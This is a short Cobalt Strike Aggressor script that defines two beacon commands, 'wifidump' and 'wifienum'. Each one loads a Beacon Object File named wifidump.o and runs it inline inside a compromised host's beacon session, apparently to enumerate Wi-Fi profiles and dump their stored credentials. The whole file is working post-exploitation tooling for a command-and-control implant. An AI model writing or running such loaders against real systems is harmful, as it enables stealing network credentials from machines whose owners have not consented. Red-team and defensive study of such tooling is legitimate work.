alias wifidump {
	local('$handle $data $args');


	# read in the right BOF file
	$handle = openf(script_resource("wifidump.o"));
	$data   = readb($handle, -1);
	closef($handle);

	# pack our arguments
	$args   = bof_pack($1, "Z", $2);

	# announce what we're doing
	btask($1, "Running wifidump BOF");
	
	# execute it.
	beacon_inline_execute($1, $data, "wifidump", $args);
}

alias wifienum {
	local('$handle $data $args');


	# read in the right BOF file
	$handle = openf(script_resource("wifidump.o"));
	$data   = readb($handle, -1);
	closef($handle);

	# pack our arguments
	$args   = bof_pack($1, "Z", $2);

	# announce what we're doing
	btask($1, "Running wifidump BOF");
	
	# execute it.
	beacon_inline_execute($1, $data, "wifienum", $args);
}